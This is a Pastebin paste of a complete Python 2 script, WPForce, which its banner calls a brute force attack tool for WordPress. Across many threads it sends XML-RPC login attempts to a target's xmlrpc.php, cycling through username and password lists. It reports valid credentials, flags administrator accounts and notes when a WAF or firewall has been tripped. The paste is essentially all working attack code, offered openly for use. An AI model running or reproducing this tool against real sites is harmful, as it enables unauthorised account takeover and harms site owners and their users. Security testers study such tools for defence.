API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 25th, 2019
48
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.50 KB | None | 0 0
raw download clone embed print report
  1. import re
  2. import sys
  3. import time
  4. import socket
  5. import urllib2
  6. import argparse
  7. import threading
  8. from urlparse import urljoin
  9.  
  10. __author__ = 'n00py'
  11. # These variables must be shared by all threads dynamically
  12. correct_pairs = {}
  13. total = 0
  14.  
  15. def has_colours(stream):
  16. if not hasattr(stream, "isatty"):
  17. return False
  18. if not stream.isatty():
  19. return False # auto color only on TTYs
  20. try:
  21. import curses
  22. curses.setupterm()
  23. return curses.tigetnum("colors") > 2
  24. except:
  25. return False
  26. has_colours = has_colours(sys.stdout)
  27. BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
  28.  
  29.  
  30. def printout(text, colour=WHITE):
  31. if has_colours:
  32. seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
  33. sys.stdout.write(seq)
  34. else:
  35. sys.stdout.write(text)
  36.  
  37.  
  38. def slice_list(input, size):
  39. input_size = len(input)
  40. slice_size = input_size / size
  41. remain = input_size % size
  42. result = []
  43. iterator = iter(input)
  44. for i in range(size):
  45. result.append([])
  46. for j in range(slice_size):
  47. result[i].append(iterator.next())
  48. if remain:
  49. result[i].append(iterator.next())
  50. remain -= 1
  51. return result
  52.  
  53.  
  54. def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
  55. global total
  56. global correct_pairs
  57. for n in wordlist:
  58. current_pass = wordlist.index(n)
  59. for x in userlist:
  60. current_user = userlist.index(x)
  61. user = userlist[current_user]
  62. password = wordlist[current_pass]
  63. if user not in correct_pairs:
  64. if user != "":
  65. if password != "":
  66. PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
  67. total += 1
  68.  
  69.  
  70. def BuildThreads(list_array,url,debug,userlist,verbose,agent):
  71. if debug:
  72. print "Here is the content of the wordlists for each thread"
  73. for i in range(len(list_array)):
  74. print "Thread " + str(i)
  75. printout(str(list_array[i]), YELLOW)
  76. print "\n-----------------------------------------------------"
  77. threads = []
  78. for i in range(len(list_array)):
  79. t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
  80. t.daemon = True
  81. threads.append(t)
  82. t.start()
  83.  
  84.  
  85. def PrintBanner(input,wordlist,url,userlist,passlist):
  86. banner = """\
  87. ,-~~-.___. __ __ ____ _____
  88. / | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
  89. ( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
  90. \_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
  91. ==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
  92. / \-'~; || | v.1.0.0
  93. / __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
  94. =( _____||________| ~n00py~
  95. """
  96. print banner
  97. print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
  98. print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
  99. print ("URL: %s" % url)
  100.  
  101.  
  102. def TestSite(url):
  103. protocheck(url)
  104. print "Trying: " + url
  105. try:
  106. urllib2.urlopen(url, timeout=3)
  107. except urllib2.HTTPError, e:
  108. if e.code == 405:
  109. print url + " found!"
  110. print "Now the brute force will begin! >:)"
  111. if e.code == 404:
  112. printout(str(e), YELLOW)
  113. print " - XMLRPC has been moved, removed, or blocked"
  114. sys.exit()
  115. except urllib2.URLError, g:
  116. printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
  117. sys.exit()
  118. except socket.timeout as e:
  119. print type(e)
  120. printout("The socket timed out, try it again.", YELLOW)
  121. sys.exit()
  122.  
  123.  
  124. def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
  125. global passlist
  126. if verbose is True or debug is True:
  127. if debug is True:
  128. thready = "[Thread " + str(thread_no) + "]"
  129. printout(thready, YELLOW)
  130. print "Trying " + user + " : " + password + "\n",
  131. headers = {'User-Agent': agent,
  132. 'Connection': 'keep-alive',
  133. 'Accept': 'text/html'
  134. }
  135. post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
  136. try:
  137. req = urllib2.Request(url, post, headers)
  138. response = urllib2.urlopen(req, timeout=3)
  139. the_page = response.read()
  140. look_for = "isAdmin"
  141. try:
  142. splitter = the_page.split(look_for, 1)[1]
  143. correct_pairs[user] = password
  144. print "--------------------------"
  145. success = "[" + user + " : " + password + "] are valid credentials! "
  146. adminAlert = ""
  147. if splitter[23] == "1":
  148. adminAlert = "- THIS ACCOUNT IS ADMIN"
  149. printout(success, GREEN)
  150. printout(adminAlert, RED)
  151. print "\n--------------------------"
  152. except:
  153. pass
  154. except urllib2.URLError, e:
  155. if e.code == 404 or e.code == 403:
  156. global total
  157. printout(str(e), YELLOW)
  158. print " - WAF or security plugin likely in use"
  159. total = len(passlist)
  160. sys.exit()
  161. else:
  162. printout(str(e), YELLOW)
  163. print " - Try reducing Thread count "
  164. if args.verbose is True or args.debug is True:
  165. print user + ":" + password + " was skipped"
  166. except socket.timeout as e:
  167. printout(str(e), YELLOW)
  168. print " - Try reducing Thread count "
  169. if args.verbose is True or args.debug is True:
  170. print user + ":" + password + " was skipped"
  171. except socket.error as e:
  172. printout(str(e), YELLOW)
  173. print " - Got an RST, Probably tripped the firewall\n",
  174. total = len(passlist)
  175. sys.exit()
  176.  
  177.  
  178. def protocheck(url):
  179. url_pattern = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
  180. if not url_pattern.match(url):
  181. printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
  182. sys.exit()
  183.  
  184. def main():
  185. parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
  186. users = parser.add_mutually_exclusive_group(required=True)
  187. users.add_argument('-i','--input', help='Input file name')
  188. users.add_argument('-si' '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
  189. parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
  190. parser.add_argument('-u','--url',help='URL of target', required=True)
  191. parser.add_argument('-v','--verbose',help=' Verbose output. Show the attemps as they happen.', required=False, action='store_true')
  192. parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
  193. parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
  194. parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
  195. args = parser.parse_args()
  196.  
  197. url = args.url
  198. url = urljoin(url, '/xmlrpc.php')
  199.  
  200. if args.input:
  201. userlist = open(args.input, 'r').read().split('\n')
  202. else:
  203. printout("Remember to pass usernames in space delimited form!\n", YELLOW)
  204. userlist = args.singleinput
  205.  
  206. totalusers = len(userlist)
  207.  
  208. passlist = open(args.wordlist, 'r').read().split('\n')
  209.  
  210. PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
  211. TestSite(url)
  212.  
  213. list_array = slice_list(passlist, args.threads)
  214. BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
  215. while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
  216. time.sleep(0.1)
  217. sys.stdout.flush()
  218. percent = "%.0f%%" % (100 * (total)/len(passlist))
  219. print " " + percent + " Percent Complete\r",
  220.  
  221. print "\nAll correct pairs:"
  222. printout(str(correct_pairs), GREEN)
  223. print ""
  224.  
  225. if __name__ == "__main__":
  226. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!